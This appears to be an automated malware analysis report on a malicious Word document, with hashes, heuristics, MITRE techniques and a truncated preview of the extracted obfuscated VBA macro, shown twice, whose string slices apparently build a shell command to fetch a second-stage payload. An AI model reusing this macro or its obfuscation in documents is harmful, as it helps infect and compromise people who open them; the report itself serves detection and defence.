Office (OLE) malware analysis — malicious · b73f346724b1b339

MALICIOUS

Office (OLE)

99.5 KB Created: 2018-02-12 11:55:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: e9ad150022d05de37b5dbfcfd5e8d12d SHA-1: 7ad4f416e8183b2eaaff6d46f8f623021815b679 SHA-256: b73f346724b1b3391ad5efe8515fe932aa8104fe2a0116390ea57e28c6bea39d

82 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, indicated by the OLE_VBA_MACROS heuristic. The presence of the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic suggests an attempt to automatically execute code upon opening. The VBA script, though obfuscated, likely aims to download and execute a second-stage payload, as suggested by string concatenation patterns that appear to form URLs or commands. The large slack space in the OLE structure (OLE_SLACK_ANOMALY) is also a common characteristic of packed or obfuscated malicious documents.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 101,888 bytes but its declared streams total only 22,859 bytes — 79,029 bytes (78%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9521 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9521 bytes
SHA-256: `a0e6025246ced225e604e6b2d437fa3930afb29bb42243ecfb109c1a21992632`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "JFnaChIIbwsP" Function KnfHNiPtkMPwii() On Error Resume Next JvqJWd = njuiGsW - Sgn(NKZwcfo) - (9899041 - Tan(3083860) / 2233424 - ChrW(sriruFO)) ALJDBtE = lwSfhWDrSlJ - Sgn(XAjsKvurQBcSQ) - (9164880 - Tan(7181167) / 5336838 - ChrW(pAdrJ)) NsqzVXjpTw = UufrZYoVOGQ - Sgn(sHljwKXSkVAPm) - (7135031 - Tan(5306337) / 6594975 - ChrW(ljEOPPwfD)) wjbEO = aBHwAWfzfrB + Mid(WCFVVq + "rHW11jRttk61OCSiPKjVHLqKhiuj" + vpcibOd, 8, 3) uZSfqfaV = vpE - Sgn(EHoPlrHLUkNl) - (4490827 - Tan(3007692) / 3298774 - ChrW(Qzj)) pqGfZQj = WnlkoTQ - Sgn(jIFcOAvrF) - (13044 - Tan(3893927) / 9357427 - ChrW(uYtMaJMajkzJ)) KpXWOfJ = URWDbRbfbLi - Sgn(WXUZwPdjfbP) - (8424830 - Tan(4620756) / 2666036 - ChrW(DBzXI)) oGhDhA = ScfOLzAtUX + Mid(BSTqA + "ZDt0rDset %UiDW9qbwESlOt" + tPFozFsdaLjcrn, 7, 9) EHRDAJlP = coVTrrqEz - Sgn(bOVICcwJXLAO) - (511936 - Tan(7812533) / 8519645 - ChrW(mbqVLuzjq)) HzwMG = tHMuBwnd - Sgn(LjkzBiDjMdNlh) - (5193906 - Tan(3355275) / 1018167 - ChrW(ObfjQp)) fLlhn = ijpzdJE - Sgn(YwjrBbomI) - (2052729 - Tan(7211543) / 400868 - ChrW(mLjupmhLw)) mPjMmnh = ifdVBYCVK + Mid(MObEmsA + "CqPSioFzGjB%=p^oM1KaHITtlzHPSpSkDi1aPEI" + UTaEtCifNHX, 5, 12) nzNjLO = XICoXWPaklziH - Sgn(sCEicqZa) - (7346162 - Tan(3937680) / 7262693 - ChrW(IWbqQHiculDSfD)) bEvQLOSnRP = mAJdUjCw - Sgn(RwKwSzW) - (6596186 - Tan(468423) / 4688098 - ChrW(twuUqE)) DltFBSQaXtm = cHzlDYSnZ - Sgn(rRSGZGYUw) - (6145174 - Tan(2095357) / 9420688 - ChrW(UPGqin)) mciSS = vuTURtFG + Mid(ZmM + "ZT81QM2PZzOMbspWq%=^sh^ell&&!uKrmO7mFmMV1" + uaDnZpXVfno, 14, 16) wBcQNKiB = Qjk - Sgn(rbJzjZVdiBj) - (2145379 - Tan(9194198) / 7059213 - ChrW(trjtwqKvDsfE)) jNmTfbl = nkpa - Sgn(GiZjYmGWAqv) - (9877350 - Tan(5499174) / 730386 - ChrW(AKJhnouhfG)) JqVOBRmljI = BVQq - Sgn(LIcpGOJTwnZqT) - (9971606 - Tan(860354) / 3042572 - ChrW(VEcaImuMw)) kdikBRROa = onQCZpVj + Mid(mjiXtrlFHTrWA + "IFo6WjrEhrvttkD1F1qEDTl1Sii" + YTfsiVwinzToD, 8, 8) nZJWQYI = MOUCVhdJUfBKCT - Sgn(XPNPMtRbkX) - (7486471 - Tan(6289159) / 1485824 - ChrW(NcZLktwbhUS)) QhpEfs = SRVoazuYpQn - Sgn(NFvmkfiAV) - (5007639 - Tan(1460376) / 721166 - ChrW(wSajwhtwb)) jrGvIkjjFX = zGvzpmjuw - Sgn(zwiwJrClRQsK) - (3371495 - Tan(2451233) / 5331926 - ChrW(Tptjufmivj)) NtDfnss = dRlkGKvkqAObm + Mid(qkA + "thFIcKm%UiDl6IhDiSLrGPLKt8 f" + ENjBra, 8, 4) PwFAlrIHkl = zBibr - Sgn(PoEnAbuGrGMiv) - (8516828 - Tan(5949380) / 9567642 - ChrW(LomZwBKO)) pfoiMh = jXqmAuSai - Sgn(JFSkF) - (9349706 - Tan(7207718) / 9325410 - ChrW(KHlh)) iTUbUb = fWm - Sgn(SSmu) - (4919309 - Tan(4835390) / 8991188 - ChrW(QFGSQUNS)) BNfqB = htOmfLPiAncZE + Mid(HiKjpoiVKS + "WwpDspWq%! mDiQPfErcamMPw5itNBKqjlP" + ANtSLACdCUsDi, 4, 8) nXmZWsD = jjqptnYOMP - Sgn(iYpHhsVFz) - (6442116 - Tan(5244014) / 9684093 - ChrW(KCMBtZkAO)) qPCFIds = wiPMKjWbcrAZoS - Sgn(sWKn) - (8053870 - Tan(191656) / 1023841 - ChrW(NfraWVmicT)) TuqGrTl = tcSfLZcGz - Sgn(ckOu) - (9450551 - Tan(147145) / 539333 - ChrW(NYzqwBhSF)) iWKMRYOJ = QtEjcLFCETvpo + Mid(dHNI + "WqWioFzGjB%!!%Ehrv16i0OvFZ" + ZOjtp, 3, 16) padKNC = TcAKuFizVVaLa - Sgn(LCkVQmpZbkEIHM) - (7231717 - Tan(4124288) / 9170555 - ChrW(sGtlt)) CjtZBFFNIi = jfPdKDuYdPiaSK - Sgn(LCuBQFmzRNAZRS) - (3870466 - Tan(1083342) / 5148043 - ChrW(oolXM)) YuWQck = Xqjisi - Sgn(ClJhE) - (9929721 - Tan(6909447) / 5685811 - ChrW(uhzPKicFJKHR)) pVcDpzbib = FpMXGOY + Mid(arzNNuGbk + "5FSHTm^REYHf9hBlDwHmth8haluHR" + djZUkEPucDfQw, 7, 1) szCmujf = aUhWtZ - Sgn(usOTGD) - (3361787 - Tan(7477384) / 5422945 - ChrW(MNpUU)) IPTqlqndD = EQmfbKPsckMwn - Sgn(RIXYNsBm) - (7075460 - Tan(5291475) / 6284249 - ChrW(bPkp)) TPqPhrRmZ = tGa - Sgn(FHtojdVrV) - (8371103 - Tan(3631291) / 9881634 - ChrW(sDpR)) GbRMichFcA = VOopfdZZHFn + Mid(zoI + "6QE Dw^er&&set %zRaLvOEiOhWQARvBaObvDL6mrqaqwq" + PFqfwtDZzDt, 6, 11) KnfHNiPtkMPwii = oGhDhA + ... (truncated)

SHA-256: a0e6025246ced225e604e6b2d437fa3930afb29bb42243ecfb109c1a21992632

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JFnaChIIbwsP"
Function KnfHNiPtkMPwii()
On Error Resume Next
JvqJWd = njuiGsW - Sgn(NKZwcfo) - (9899041 - Tan(3083860) / 2233424 - ChrW(sriruFO))
ALJDBtE = lwSfhWDrSlJ - Sgn(XAjsKvurQBcSQ) - (9164880 - Tan(7181167) / 5336838 - ChrW(pAdrJ))
NsqzVXjpTw = UufrZYoVOGQ - Sgn(sHljwKXSkVAPm) - (7135031 - Tan(5306337) / 6594975 - ChrW(ljEOPPwfD))
wjbEO = aBHwAWfzfrB + Mid(WCFVVq + "rHW11jRttk61OCSiPKjVHLqKhiuj" + vpcibOd, 8, 3)
uZSfqfaV = vpE - Sgn(EHoPlrHLUkNl) - (4490827 - Tan(3007692) / 3298774 - ChrW(Qzj))
pqGfZQj = WnlkoTQ - Sgn(jIFcOAvrF) - (13044 - Tan(3893927) / 9357427 - ChrW(uYtMaJMajkzJ))
KpXWOfJ = URWDbRbfbLi - Sgn(WXUZwPdjfbP) - (8424830 - Tan(4620756) / 2666036 - ChrW(DBzXI))
oGhDhA = ScfOLzAtUX + Mid(BSTqA + "ZDt0rDset %UiDW9qbwESlOt" + tPFozFsdaLjcrn, 7, 9)
EHRDAJlP = coVTrrqEz - Sgn(bOVICcwJXLAO) - (511936 - Tan(7812533) / 8519645 - ChrW(mbqVLuzjq))
HzwMG = tHMuBwnd - Sgn(LjkzBiDjMdNlh) - (5193906 - Tan(3355275) / 1018167 - ChrW(ObfjQp))
fLlhn = ijpzdJE - Sgn(YwjrBbomI) - (2052729 - Tan(7211543) / 400868 - ChrW(mLjupmhLw))
mPjMmnh = ifdVBYCVK + Mid(MObEmsA + "CqPSioFzGjB%=p^oM1KaHITtlzHPSpSkDi1aPEI" + UTaEtCifNHX, 5, 12)
nzNjLO = XICoXWPaklziH - Sgn(sCEicqZa) - (7346162 - Tan(3937680) / 7262693 - ChrW(IWbqQHiculDSfD))
bEvQLOSnRP = mAJdUjCw - Sgn(RwKwSzW) - (6596186 - Tan(468423) / 4688098 - ChrW(twuUqE))
DltFBSQaXtm = cHzlDYSnZ - Sgn(rRSGZGYUw) - (6145174 - Tan(2095357) / 9420688 - ChrW(UPGqin))
mciSS = vuTURtFG + Mid(ZmM + "ZT81QM2PZzOMbspWq%=^sh^ell&&!uKrmO7mFmMV1" + uaDnZpXVfno, 14, 16)
wBcQNKiB = Qjk - Sgn(rbJzjZVdiBj) - (2145379 - Tan(9194198) / 7059213 - ChrW(trjtwqKvDsfE))
jNmTfbl = nkpa - Sgn(GiZjYmGWAqv) - (9877350 - Tan(5499174) / 730386 - ChrW(AKJhnouhfG))
JqVOBRmljI = BVQq - Sgn(LIcpGOJTwnZqT) - (9971606 - Tan(860354) / 3042572 - ChrW(VEcaImuMw))
kdikBRROa = onQCZpVj + Mid(mjiXtrlFHTrWA + "IFo6WjrEhrvttkD1F1qEDTl1Sii" + YTfsiVwinzToD, 8, 8)
nZJWQYI = MOUCVhdJUfBKCT - Sgn(XPNPMtRbkX) - (7486471 - Tan(6289159) / 1485824 - ChrW(NcZLktwbhUS))
QhpEfs = SRVoazuYpQn - Sgn(NFvmkfiAV) - (5007639 - Tan(1460376) / 721166 - ChrW(wSajwhtwb))
jrGvIkjjFX = zGvzpmjuw - Sgn(zwiwJrClRQsK) - (3371495 - Tan(2451233) / 5331926 - ChrW(Tptjufmivj))
NtDfnss = dRlkGKvkqAObm + Mid(qkA + "thFIcKm%UiDl6IhDiSLrGPLKt8 f" + ENjBra, 8, 4)
PwFAlrIHkl = zBibr - Sgn(PoEnAbuGrGMiv) - (8516828 - Tan(5949380) / 9567642 - ChrW(LomZwBKO))
pfoiMh = jXqmAuSai - Sgn(JFSkF) - (9349706 - Tan(7207718) / 9325410 - ChrW(KHlh))
iTUbUb = fWm - Sgn(SSmu) - (4919309 - Tan(4835390) / 8991188 - ChrW(QFGSQUNS))
BNfqB = htOmfLPiAncZE + Mid(HiKjpoiVKS + "WwpDspWq%! mDiQPfErcamMPw5itNBKqjlP" + ANtSLACdCUsDi, 4, 8)
nXmZWsD = jjqptnYOMP - Sgn(iYpHhsVFz) - (6442116 - Tan(5244014) / 9684093 - ChrW(KCMBtZkAO))
qPCFIds = wiPMKjWbcrAZoS - Sgn(sWKn) - (8053870 - Tan(191656) / 1023841 - ChrW(NfraWVmicT))
TuqGrTl = tcSfLZcGz - Sgn(ckOu) - (9450551 - Tan(147145) / 539333 - ChrW(NYzqwBhSF))
iWKMRYOJ = QtEjcLFCETvpo + Mid(dHNI + "WqWioFzGjB%!!%Ehrv16i0OvFZ" + ZOjtp, 3, 16)
padKNC = TcAKuFizVVaLa - Sgn(LCkVQmpZbkEIHM) - (7231717 - Tan(4124288) / 9170555 - ChrW(sGtlt))
CjtZBFFNIi = jfPdKDuYdPiaSK - Sgn(LCuBQFmzRNAZRS) - (3870466 - Tan(1083342) / 5148043 - ChrW(oolXM))
YuWQck = Xqjisi - Sgn(ClJhE) - (9929721 - Tan(6909447) / 5685811 - ChrW(uhzPKicFJKHR))
pVcDpzbib = FpMXGOY + Mid(arzNNuGbk + "5FSHTm^REYHf9hBlDwHmth8haluHR" + djZUkEPucDfQw, 7, 1)
szCmujf = aUhWtZ - Sgn(usOTGD) - (3361787 - Tan(7477384) / 5422945 - ChrW(MNpUU))
IPTqlqndD = EQmfbKPsckMwn - Sgn(RIXYNsBm) - (7075460 - Tan(5291475) / 6284249 - ChrW(bPkp))
TPqPhrRmZ = tGa - Sgn(FHtojdVrV) - (8371103 - Tan(3631291) / 9881634 - ChrW(sDpR))
GbRMichFcA = VOopfdZZHFn + Mid(zoI + "6QE Dw^er&&set %zRaLvOEiOhWQARvBaObvDL6mrqaqwq" + PFqfwtDZzDt, 6, 11)
KnfHNiPtkMPwii = oGhDhA + 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.